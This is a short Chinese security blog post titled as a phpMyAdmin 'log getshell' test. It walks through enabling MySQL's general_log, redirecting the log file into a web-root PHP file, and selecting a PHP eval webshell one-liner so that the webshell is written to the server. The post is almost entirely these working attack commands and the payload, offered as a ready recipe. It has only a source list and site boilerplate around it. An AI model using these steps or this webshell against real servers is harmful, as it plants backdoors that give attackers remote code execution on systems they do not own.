微慑信息网

phpmyadmin日志getshell测试

1、登录phpmyadmin

2、查看数据路径,作为猜web路径辅助

select @@datadir;

3、查看日志功能是否开启:

(一般这个日志记录是默认关闭的,需要我们手动开启)

show variables like '%general%';

4、开启日志功能:

SET GLOBAL general_log='on';

5、修改日志路径:

set global general_log_file='D:\\phpStudy\\WWW\\shell.php';

6、执行包含shell的语句即可:

select "<?php eval($_POST['gg']);?>";

 

7、查看结果:

8、ps:发布文章火绒提示webshell….

 

拓展阅读(点评/知识):

参考来源:

https://zhuanlan.zhihu.com/p/144061985

https://www.jianshu.com/p/cd618e8ef007

本文标题:phpmyadmin日志getshell测试
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2020/1222_13192.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » phpmyadmin日志getshell测试
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们